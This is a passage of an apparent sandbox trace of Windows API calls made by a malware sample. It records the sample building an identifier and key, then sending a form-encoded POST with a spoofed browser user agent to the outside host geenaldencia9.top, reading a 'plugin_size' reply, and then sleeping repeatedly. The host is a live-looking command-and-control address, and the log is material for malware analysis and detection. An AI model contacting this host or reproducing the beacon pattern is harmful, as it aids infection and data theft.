Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xaf42ba80 [0270.992] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x7195e8d8 [0270.992] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x56174246 [0270.992] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x2a016192 [0270.992] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xdd88cf80 [0270.992] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x283ee755 [0270.992] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x8c56d91f [0270.992] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x38ef6ccf [0270.992] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xeb541d59 [0270.992] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x102c7e33 [0270.992] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xb8810c5a [0270.992] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x787f2958 [0270.992] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xef725cdb [0270.992] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x33a1d383 [0270.992] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x9e068af7 [0270.992] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x4a702ad [0270.992] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xf47d5853 [0270.992] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x4d6d6340 [0270.993] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xa88e8044 [0270.993] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x79c4e65c [0270.993] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xa468a8b9 [0270.993] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x4dbc7ae5 [0270.993] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x719211e7 [0270.993] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xb24c1019 [0270.993] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x4ed243 [0270.993] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xa8e3e530 [0270.993] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x94c1407f [0270.993] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xeff3962f [0270.993] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xa15b514b [0270.993] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xb78f865b [0270.993] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xdec965c1 [0270.993] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x3908fdd3 [0270.993] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x8c2c5118 [0270.993] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xb0ec0aaa [0270.993] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xbef3098b [0270.993] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xc253498e [0270.993] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xf5296a22 [0270.993] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xa2223138 [0270.993] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x74d6597e [0270.993] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xed1be0ca [0270.993] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x6c7d3cd2 [0270.993] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x396fe8c9 [0270.993] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x8d2898c [0270.993] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x68550474 [0270.993] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x286d063d [0270.993] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xd5c05d64 [0270.993] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x1dbc5d3a [0270.993] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x166bf195 [0270.993] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xfe4f9ab [0270.993] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0xde) returned 0x9881950 [0270.993] lstrcatA (in: lpString1="", lpString2="FE7F15060B875FB9FB2A49F08D5D03120C287F38" | out: lpString1="FE7F15060B875FB9FB2A49F08D5D03120C287F38") returned="FE7F15060B875FB9FB2A49F08D5D03120C287F38" [0270.993] lstrcatA (in: lpString1="", lpString2="XC64ZB" | out: lpString1="XC64ZB") returned="XC64ZB" [0270.993] lstrcatA (in: lpString1="", lpString2="" | out: lpString1="") returned="" [0270.993] lstrcatA (in: lpString1="", lpString2="g#VKOGT@xwKXI'kdB@<3S7iq)OIM=3586veycxt6tPv.?m<5yzYFC,+:_Kf%it*%U%Tk/xbUR'YBy?oM32.p7]SS1ALHXPx+OR>*@0%wu6@Z:v-FR`,ZR%7J-Emq?G\"]uT[GHB" | out: lpString1="g#VKOGT@xwKXI'kdB@<3S7iq)OIM=3586veycxt6tPv.?m<5yzYFC,+:_Kf%it*%U%Tk/xbUR'YBy?oM32.p7]SS1ALHXPx+OR>*@0%wu6@Z:v-FR`,ZR%7J-Emq?G\"]uT[GHB") returned="g#VKOGT@xwKXI'kdB@<3S7iq)OIM=3586veycxt6tPv.?m<5yzYFC,+:_Kf%it*%U%Tk/xbUR'YBy?oM32.p7]SS1ALHXPx+OR>*@0%wu6@Z:v-FR`,ZR%7J-Emq?G\"]uT[GHB" [0270.994] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x10c) returned 0x9881a40 [0270.994] lstrlenA (lpString="http://geenaldencia9.top/") returned 25 [0270.994] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9881840, cbMultiByte=26, lpWideCharStr=0x9881a40, cchWideChar=52 | out: lpWideCharStr="http://geenaldencia9.top/") returned 26 [0270.994] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x109efc18 | out: pProxyConfig=0x109efc18) returned 1 [0271.076] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x9d3fc70 [0271.092] WinHttpCrackUrl (in: pwszUrl="http://geenaldencia9.top/", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x109efcd0 | out: lpUrlComponents=0x109efcd0) returned 1 [0271.092] WinHttpConnect (hSession=0x9d3fc70, pswzServerName="geenaldencia9.top", nServerPort=0x50, dwReserved=0x0) returned 0xad54150 [0271.092] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x12) returned 0x9881b60 [0271.092] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x68) returned 0x9881b80 [0271.092] WinHttpOpenRequest (hConnect=0xad54150, pwszVerb="POST", pwszObjectName="/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x0) returned 0x9d5bc50 [0271.092] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x3a) returned 0x9881bf0 [0271.092] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x10d) returned 0x9881c40 [0271.092] wsprintfW (in: param_1=0x9881c40, param_2="Accept: */*\r\nReferer: %S" | out: param_1="Accept: */*\r\nReferer: http://geenaldencia9.top/") returned 47 [0271.092] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9881bf0) returned 1 [0271.092] WinHttpAddRequestHeaders (hRequest=0x9d5bc50, pwszHeaders="Accept: */*\r\nReferer: http://geenaldencia9.top/", dwHeadersLength=0xffffffff, dwModifiers=0x20000000) returned 1 [0271.092] WinHttpSendRequest (hRequest=0x9d5bc50, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x0, lpOptional=0x9881950*, dwOptionalLength=0xd5, dwTotalLength=0xd5, dwContext=0x0) returned 1 [0272.531] WinHttpReceiveResponse (hRequest=0x9d5bc50, lpReserved=0x0) returned 1 [0272.531] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x2800) returned 0x9881d60 [0272.531] WinHttpReadData (in: hRequest=0x9d5bc50, lpBuffer=0x9881d60, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x109efd88 | out: lpBuffer=0x9881d60*, lpdwNumberOfBytesRead=0x109efd88*=0x18) returned 1 [0272.531] RtlReAllocateHeap (Heap=0x9880000, Flags=0x8, Ptr=0x9881d60, Size=0x5000) returned 0x9881d60 [0272.531] WinHttpReadData (in: hRequest=0x9d5bc50, lpBuffer=0x9881d78, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x109efd88 | out: lpBuffer=0x9881d78*, lpdwNumberOfBytesRead=0x109efd88*=0x0) returned 1 [0272.532] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x590000 [0272.533] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9881d60) returned 1 [0272.533] WinHttpCloseHandle (hInternet=0x9d5bc50) returned 1 [0272.533] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9881c40) returned 1 [0272.533] WinHttpCloseHandle (hInternet=0xad54150) returned 1 [0272.533] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9881b80) returned 1 [0272.534] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9881b60) returned 1 [0272.534] WinHttpCloseHandle (hInternet=0x9d3fc70) returned 1 [0272.534] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9881a40) returned 1 [0272.534] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x98818b0) returned 1 [0272.534] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9881950) returned 1 [0272.535] lstrlenA (lpString="ä\x070|:|plugin_size=0") returned 19 [0272.535] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x15) returned 0x98818b0 [0272.536] lstrlenA (lpString="0|:|plugin_size=0") returned 17 [0272.536] lstrlenA (lpString="plugin_size") returned 11 [0272.536] atoi (_Str="0") returned 0 [0272.536] lstrlenA (lpString="0|:|plugin_size=0") returned 17 [0272.536] lstrlenA (lpString="|:|") returned 3 [0272.536] MapViewOfFile (hFileMappingObject=0x1cdc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x7f10000 [0272.544] lstrcatA (in: lpString1="", lpString2="plugin_size=0" | out: lpString1="plugin_size=0") returned="plugin_size=0" [0272.544] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x7f10000) returned 0x0 [0272.565] atoi (_Str="0") returned 0 [0272.565] VirtualFree (lpAddress=0x590000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0272.565] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9881840) returned 1 [0272.565] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wvhwbfa" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\wvhwbfa"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0272.566] Sleep (dwMilliseconds=0x258) [0272.567] Sleep (dwMilliseconds=0x258) [0272.569] Sleep (dwMilliseconds=0x258) [0272.570] Sleep (dwMilliseconds=0x258) [0272.572] Sleep (dwMilliseconds=0x258) [0272.573] Sleep (dwMilliseconds=0x258) [0272.575] Sleep (dwMilliseconds=0x258) [0272.576] Sleep (dwMilliseconds=0x258) [0272.578] Sleep (dwMilliseconds=0x258) [0272.579] Sleep (dwMilliseconds=0x258) [0272.581] Sleep (dwMilliseconds=0x258) [0272.583] Sleep (dwMilliseconds=0x258) [0272.584] Sleep (dwMilliseconds=0x258) [0272.586] Sleep (dwMilliseconds=0x258) [0272.591] Sleep (dwMilliseconds=0x258) [0272.593] Sleep (dwMilliseconds=0x258) [0272.594] Sleep (dwMilliseconds=0x258) [0272.596] Sleep (dwMilliseconds=0x258) [0272.597] Sleep (dwMilliseconds=0x258) [0272.598] Sleep (dwMilliseconds=0x258) [0272.600] Sleep (dwMilliseconds=0x258) [0272.601] Sleep (dwMilliseconds=0x258) [0272.603] Sleep (dwMilliseconds=0x258) [0272.604] Sleep (dwMilliseconds=0x258) [0272.606] Sleep (dwMilliseconds=0x258) [0272.607] Sleep (dwMilliseconds=0x258) [0272.609] Sleep (dwMilliseconds=0x258) [0272.649] Sleep (dwMilliseconds=0x258) [0272.662] Sleep (dwMilliseconds=0x258) [0272.735] Sleep (dwMilliseconds=0x258) [0272.774] Sleep (dwMilliseconds=0x258) [0272.905] Sleep (dwMilliseconds=0x258) [0273.012] Sleep (dwMilliseconds=0x258) [0273.106] Sleep (dwMilliseconds=0x258) [0273.159] Sleep (dwMilliseconds=0x258) [0273.182] Sleep (dwMilliseconds=0x258) [0273.226] Sleep (dwMilliseconds=0x258) [0273.285] Sleep (dwMilliseconds=0x258) [0273.290] Sleep (dwMilliseconds=0x258) [0273.295] Sleep (dwMilliseconds=0x258) [0273.333] Sleep (dwMilliseconds=0x258) [0273.368] Sleep (dwMilliseconds=0x258) [0273.380] Sleep (dwMilliseconds=0x258) [0273.412] Sleep (dwMilliseconds=0x258) [0273.449] Sleep (dwMilliseconds=0x258) [0273.470] Sleep (dwMilliseconds=0x258) [0273.492] Sleep (dwMilliseconds=0x258) [0273.527] Sleep (dwMilliseconds=0x258) [0273.564] Sleep (dwMilliseconds=0x258) [0273.570] Sleep (dwMilliseconds=0x258) [0273.606] Sleep (dwMilliseconds=0x258) [0273.642] Sleep (dwMilliseconds=0x258) [0273.648] Sleep (dwMilliseconds=0x258) [0273.694] Sleep (dwMilliseconds=0x258) [0273.729] Sleep (dwMilliseconds=0x258) [0273.745] Sleep (dwMilliseconds=0x258) [0273.747] Sleep (dwMilliseconds=0x258) [0273.767] Sleep (dwMilliseconds=0x258) [0273.804] Sleep (dwMilliseconds=0x258) [0273.854] Sleep (dwMilliseconds=0x258) [0273.856] Sleep (dwMilliseconds=0x258) [0273.915] Sleep (dwMilliseconds=0x258) [0273.952] Sleep (dwMilliseconds=0x258) [0273.990] Sleep (dwMilliseconds=0x258) [0273.992] Sleep (dwMilliseconds=0x258) [0273.996] Sleep (dwMilliseconds=0x258) [0274.032] Sleep (dwMilliseconds=0x258) [0274.069] Sleep (dwMilliseconds=0x258) [0274.081] Sleep (dwMilliseconds=0x258) [0274.108] Sleep (dwMilliseconds=0x258) [0274.144] Sleep (dwMilliseconds=0x258) [0274.163] Sleep (dwMilliseconds=0x258) [0274.182] Sleep (dwMilliseconds=0x258) [0274.224] Sleep (dwMilliseconds=0x258) [0274.268] Sleep (dwMilliseconds=0x258) [0274.278] Sleep (dwMilliseconds=0x258) [0274.315] Sleep (dwMilliseconds=0x258) [0274.351] Sleep (dwMilliseconds=0x258) [0274.357] Sleep (dwMilliseconds=0x258) [0274.389] Sleep (dwMilliseconds=0x258) [0274.436] Sleep (dwMilliseconds=0x258) [0274.451] Sleep (dwMilliseconds=0x258) [0274.476] Sleep (dwMilliseconds=0x258) [0274.513] Sleep (dwMilliseconds=0x258) [0274.540] Sleep (dwMilliseconds=0x258) [0274.552] Sleep (dwMilliseconds=0x258) [0274.587] Sleep (dwMilliseconds=0x258) [0274.624] Sleep (dwMilliseconds=0x258) [0274.660] Sleep (dwMilliseconds=0x258) [0274.696] Sleep (dwMilliseconds=0x258) [0274.707] Sleep (dwMilliseconds=0x258) [0274.708] Sleep (dwMilliseconds=0x258) [0274.740] Sleep (dwMilliseconds=0x258) [0274.775] Sleep (dwMilliseconds=0x258) [0274.794] Sleep (dwMilliseconds=0x258) [0274.796] Sleep (dwMilliseconds=0x258) [0274.813] Sleep (dwMilliseconds=0x258) [0274.860] Sleep (dwMilliseconds=0x258) [0274.892] Sleep (dwMilliseconds=0x258) [0274.900] Sleep (dwMilliseconds=0x258) [0274.937] Sleep (dwMilliseconds=0x258) [0274.976] Sleep (dwMilliseconds=0x258) [0274.983] Sleep (dwMilliseconds=0x258) [0274.984] Sleep (dwMilliseconds=0x258) [0275.019] Sleep (dwMilliseconds=0x258) [0275.098] Sleep (dwMilliseconds=0x258) [0275.119] Sleep (dwMilliseconds=0x258) [0275.120] Sleep (dwMilliseconds=0x258) [0275.142] Sleep (dwMilliseconds=0x258) [0275.176] Sleep (dwMilliseconds=0x258) [0275.202] Sleep (dwMilliseconds=0x258) [0275.203] Sleep (dwMilliseconds=0x258) [0275.217] Sleep (dwMilliseconds=0x258) [0275.278] Sleep (dwMilliseconds=0x258) [0275.311] Sleep (dwMilliseconds=0x258) [0275.312] Sleep (dwMilliseconds=0x258) [0275.317] Sleep (dwMilliseconds=0x258) [0275.356] Sleep (dwMilliseconds=0x258) [0275.393] Sleep (dwMilliseconds=0x258) [0275.400] Sleep (dwMilliseconds=0x258) [0275.402] Sleep (dwMilliseconds=0x258) [0275.433] Sleep (dwMilliseconds=0x258) [0275.468] Sleep (dwMilliseconds=0x258) [0275.484] Sleep (dwMilliseconds=0x258) [0275.486] Sleep (dwMilliseconds=0x258) [0275.511] Sleep (dwMilliseconds=0x258) [0275.548] Sleep (dwMilliseconds=0x258) [0275.573] Sleep (dwMilliseconds=0x258) [0275.575] Sleep (dwMilliseconds=0x258) [0275.586] Sleep (dwMilliseconds=0x258) [0275.622] Sleep (dwMilliseconds=0x258) [0275.656] Sleep (dwMilliseconds=0x258) [0275.657] Sleep (dwMilliseconds=0x258) [0275.659] Sleep (dwMilliseconds=0x258) [0275.694] Sleep (dwMilliseconds=0x258) [0275.731] Sleep (dwMilliseconds=0x258) [0275.739] Sleep (dwMilliseconds=0x258) [0275.740] Sleep (dwMilliseconds=0x258) [0275.771] Sleep (dwMilliseconds=0x258) [0275.808] Sleep (dwMilliseconds=0x258) [0275.838] Sleep (dwMilliseconds=0x258) [0275.862] Sleep (dwMilliseconds=0x258) [0275.898] Sleep (dwMilliseconds=0x258) [0275.923] Sleep (dwMilliseconds=0x258) [0275.936] Sleep (dwMilliseconds=0x258) [0275.975] Sleep (dwMilliseconds=0x258) [0276.019] Sleep (dwMilliseconds=0x258) [0276.025] Sleep (dwMilliseconds=0x258) [0276.065] Sleep (dwMilliseconds=0x258) [0276.101] Sleep (dwMilliseconds=0x258) [0276.112] Sleep (dwMilliseconds=0x258) [0276.116] Sleep (dwMilliseconds=0x258) [0276.146] Sleep (dwMilliseconds=0x258) [0276.184] Sleep (dwMilliseconds=0x258) [0276.208] Sleep (dwMilliseconds=0x258) [0276.209] Sleep (dwMilliseconds=0x258) [0276.225] Sleep (dwMilliseconds=0x258) [0276.293] Sleep (dwMilliseconds=0x258) [0276.328] Sleep (dwMilliseconds=0x258) [0276.329] Sleep (dwMilliseconds=0x258) [0276.335] Sleep (dwMilliseconds=0x258) [0276.370] Sleep (dwMilliseconds=0x258) [0276.406] Sleep (dwMilliseconds=0x258) [0276.414] Sleep (dwMilliseconds=0x258) [0276.445] Sleep (dwMilliseconds=0x258) [0276.482] Sleep (dwMilliseconds=0x258) [0276.502] Sleep (dwMilliseconds=0x258) [0276.504] Sleep (dwMilliseconds=0x258) [0276.523] Sleep (dwMilliseconds=0x258) [0276.567] Sleep (dwMilliseconds=0x258) [0276.591] Sleep (dwMilliseconds=0x258) [0276.609] Sleep (dwMilliseconds=0x258) [0276.660] Sleep (dwMilliseconds=0x258) [0276.695] Sleep (dwMilliseconds=0x258) [0276.697] Sleep (dwMilliseconds=0x258) [0276.732] Sleep (dwMilliseconds=0x258) [0276.774] Sleep (dwMilliseconds=0x258) [0276.784] Sleep (dwMilliseconds=0x258) [0276.786] Sleep (dwMilliseconds=0x258) [0276.812] Sleep (dwMilliseconds=0x258) [0276.855] Sleep (dwMilliseconds=0x258) [0276.881] Sleep (dwMilliseconds=0x258) [0276.882] Sleep (dwMilliseconds=0x258) [0276.899] Sleep (dwMilliseconds=0x258) [0276.934] Sleep (dwMilliseconds=0x258) [0276.970] Sleep (dwMilliseconds=0x258) [0276.973] Sleep (dwMilliseconds=0x258) [0276.979] Sleep (dwMilliseconds=0x258) [0277.016] Sleep (dwMilliseconds=0x258) [0277.054] Sleep (dwMilliseconds=0x258) [0277.060] Sleep (dwMilliseconds=0x258) [0277.090] Sleep (dwMilliseconds=0x258) [0277.127] Sleep (dwMilliseconds=0x258) [0277.142] Sleep (dwMilliseconds=0x258) [0277.144] Sleep (dwMilliseconds=0x258) [0277.165] Sleep (dwMilliseconds=0x258) [0277.200] Sleep (dwMilliseconds=0x258) [0277.225] Sleep (dwMilliseconds=0x258) [0277.227] Sleep (dwMilliseconds=0x258) [0277.240] Sleep (dwMilliseconds=0x258) [0277.302] Sleep (dwMilliseconds=0x258) [0277.343] Sleep (dwMilliseconds=0x258) [0277.345] Sleep (dwMilliseconds=0x258) [0277.381] Sleep (dwMilliseconds=0x258) [0277.416] Sleep (dwMilliseconds=0x258) [0277.427] Sleep (dwMilliseconds=0x258) [0277.545] Sleep (dwMilliseconds=0x258) [0277.588] Sleep (dwMilliseconds=0x258) [0277.612] Sleep (dwMilliseconds=0x258) [0277.614] Sleep (dwMilliseconds=0x258) [0277.625] Sleep (dwMilliseconds=0x258) [0277.672] Sleep (dwMilliseconds=0x258) [0277.707] Sleep (dwMilliseconds=0x258) [0277.709] Sleep (dwMilliseconds=0x258) [0277.711] Sleep (dwMilliseconds=0x258) [0277.746] Sleep (dwMilliseconds=0x258) [0277.783] Sleep (dwMilliseconds=0x258) [0277.796] Sleep (dwMilliseconds=0x258) [0277.819] Sleep (dwMilliseconds=0x258) [0277.862] Sleep (dwMilliseconds=0x258) [0277.926] Sleep (dwMilliseconds=0x258) [0277.953] Sleep (dwMilliseconds=0x258) [0277.992] Sleep (dwMilliseconds=0x258) [0278.026] Sleep (dwMilliseconds=0x258) [0278.059] Sleep (dwMilliseconds=0x258) [0278.100] Sleep (dwMilliseconds=0x258) [0278.149] Sleep (dwMilliseconds=0x258) [0278.196] Sleep (dwMilliseconds=0x258) [0278.235] Sleep (dwMilliseconds=0x258) [0278.328] Sleep (dwMilliseconds=0x258) [0278.384] Sleep (dwMilliseconds=0x258) [0278.432] Sleep (dwMilliseconds=0x258) [0278.504] Sleep (dwMilliseconds=0x258) [0278.576] Sleep (dwMilliseconds=0x258) [0278.606] Sleep (dwMilliseconds=0x258) [0278.748] Sleep (dwMilliseconds=0x258) [0278.824] Sleep (dwMilliseconds=0x258) [0278.869] Sleep (dwMilliseconds=0x258) [0278.911] Sleep (dwMilliseconds=0x258) [0278.990] Sleep (dwMilliseconds=0x258) [0279.063] Sleep (dwMilliseconds=0x258) [0279.132] Sleep (dwMilliseconds=0x258) [0279.218] Sleep (dwMilliseconds=0x258) [0279.307] Sleep (dwMilliseconds=0x258) [0279.337] Sleep (dwMilliseconds=0x258) [0279.385] Sleep (dwMilliseconds=0x258) [0279.643] Sleep (dwMilliseconds=0x258) [0279.789] Sleep (dwMilliseconds=0x258) [0279.947] Sleep (dwMilliseconds=0x258) [0280.038] Sleep (dwMilliseconds=0x258) [0280.614] Sleep (dwMilliseconds=0x258) [0280.883] Sleep (dwMilliseconds=0x258) [0280.951] Sleep (dwMilliseconds=0x258) [0281.150] Sleep (dwMilliseconds=0x258) [0281.233] Sleep (dwMilliseconds=0x258) [0281.264] Sleep (dwMilliseconds=0x258) [0281.281] Sleep (dwMilliseconds=0x258) [0281.418] Sleep (dwMilliseconds=0x258) [0281.449] Sleep (dwMilliseconds=0x258) [0281.462] Sleep (dwMilliseconds=0x258) [0281.503] Sleep (dwMilliseconds=0x258) [0281.540] Sleep (dwMilliseconds=0x258) [0281.548] Sleep (dwMilliseconds=0x258) [0281.586] Sleep (dwMilliseconds=0x258) [0281.624] Sleep (dwMilliseconds=0x258) [0281.640] Sleep (dwMilliseconds=0x258) [0281.678] Sleep (dwMilliseconds=0x258) [0281.891] Sleep (dwMilliseconds=0x258) [0281.984] Sleep (dwMilliseconds=0x258) [0282.042] Sleep (dwMilliseconds=0x258) [0282.060] Sleep (dwMilliseconds=0x258) [0282.107] Sleep (dwMilliseconds=0x258) [0282.171] Sleep (dwMilliseconds=0x258) [0282.389] Sleep (dwMilliseconds=0x258) [0282.425] Sleep (dwMilliseconds=0x258) [0282.442] Sleep (dwMilliseconds=0x258) [0282.469] Sleep (dwMilliseconds=0x258) [0282.510] Sleep (dwMilliseconds=0x258) [0282.533] Sleep (dwMilliseconds=0x258) [0282.534] Sleep (dwMilliseconds=0x258) [0282.549] Sleep (dwMilliseconds=0x258) [0282.584] Sleep (dwMilliseconds=0x258) [0282.615] Sleep (dwMilliseconds=0x258) [0282.663] Sleep (dwMilliseconds=0x258) [0282.725] Sleep (dwMilliseconds=0x258) [0282.778] Sleep (dwMilliseconds=0x258) [0282.781] Sleep (dwMilliseconds=0x258) [0282.783] Sleep (dwMilliseconds=0x258) [0282.821] Sleep (dwMilliseconds=0x258) [0282.917] Sleep (dwMilliseconds=0x258) [0282.933] Sleep (dwMilliseconds=0x258) [0282.935] Sleep (dwMilliseconds=0x258) [0282.968] Sleep (dwMilliseconds=0x258) [0283.008] Sleep (dwMilliseconds=0x258) [0283.038] Sleep (dwMilliseconds=0x258) [0283.039] Sleep (dwMilliseconds=0x258) [0283.059] Sleep (dwMilliseconds=0x258) [0283.102] Sleep (dwMilliseconds=0x258) [0283.135] Sleep (dwMilliseconds=0x258) [0283.136] Sleep (dwMilliseconds=0x258) [0283.143] Sleep (dwMilliseconds=0x258) [0283.512] Sleep (dwMilliseconds=0x258) [0283.810] Sleep (dwMilliseconds=0x258) [0284.114] Sleep (dwMilliseconds=0x258) [0284.231] Sleep (dwMilliseconds=0x258) [0284.367] Sleep (dwMilliseconds=0x258) [0284.507] Sleep (dwMilliseconds=0x258) [0284.650] Sleep (dwMilliseconds=0x258) [0284.668] Sleep (dwMilliseconds=0x258) [0284.703] Sleep (dwMilliseconds=0x258) [0284.736] Sleep (dwMilliseconds=0x258) [0284.741] Sleep (dwMilliseconds=0x258) [0284.777] Sleep (dwMilliseconds=0x258) [0284.813] Sleep (dwMilliseconds=0x258) [0284.868] Sleep (dwMilliseconds=0x258) [0284.870] Sleep (dwMilliseconds=0x258) [0284.899] Sleep (dwMilliseconds=0x258) [0284.934] Sleep (dwMilliseconds=0x258) [0284.955] Sleep (dwMilliseconds=0x258) [0284.956] Sleep (dwMilliseconds=0x258) [0284.976] Sleep (dwMilliseconds=0x258) [0285.011] Sleep (dwMilliseconds=0x258) [0285.048] Sleep (dwMilliseconds=0x258) [0285.050] Sleep (dwMilliseconds=0x258) [0285.104] Sleep (dwMilliseconds=0x258) [0285.240] Sleep (dwMilliseconds=0x258) [0285.311] Sleep (dwMilliseconds=0x258) [0285.338] Sleep (dwMilliseconds=0x258) [0285.391] Sleep (dwMilliseconds=0x258) [0285.427] Sleep (dwMilliseconds=0x258) [0285.438] Sleep (dwMilliseconds=0x258) [0285.440] Sleep (dwMilliseconds=0x258) [0285.463] Sleep (dwMilliseconds=0x258) [0285.500] Sleep (dwMilliseconds=0x258) [0285.533] Sleep (dwMilliseconds=0x258) [0285.536] Sleep (dwMilliseconds=0x258) [0285.546] Sleep (dwMilliseconds=0x258) [0285.582] Sleep (dwMilliseconds=0x258) [0285.624] Sleep (dwMilliseconds=0x258) [0285.627] Sleep (dwMilliseconds=0x258) [0285.662] Sleep (dwMilliseconds=0x258) [0285.697] Sleep (dwMilliseconds=0x258) [0285.707] Sleep (dwMilliseconds=0x258) [0285.708] Sleep (dwMilliseconds=0x258) [0285.736] Sleep (dwMilliseconds=0x258) [0285.776] Sleep (dwMilliseconds=0x258) [0285.795] Sleep (dwMilliseconds=0x258) [0285.819] Sleep (dwMilliseconds=0x258) [0285.887] Sleep (dwMilliseconds=0x258) [0285.918] Sleep (dwMilliseconds=0x258) [0285.919] Sleep (dwMilliseconds=0x258) [0285.928] Sleep (dwMilliseconds=0x258) [0285.963] Sleep (dwMilliseconds=0x258) [0285.999] Sleep (dwMilliseconds=0x258) [0286.002] Sleep (dwMilliseconds=0x258) [0286.004] Sleep (dwMilliseconds=0x258) [0286.037] Sleep (dwMilliseconds=0x258) [0286.075] Sleep (dwMilliseconds=0x258) [0286.097] Sleep (dwMilliseconds=0x258) [0286.122] Sleep (dwMilliseconds=0x258) [0286.157] Sleep (dwMilliseconds=0x258) 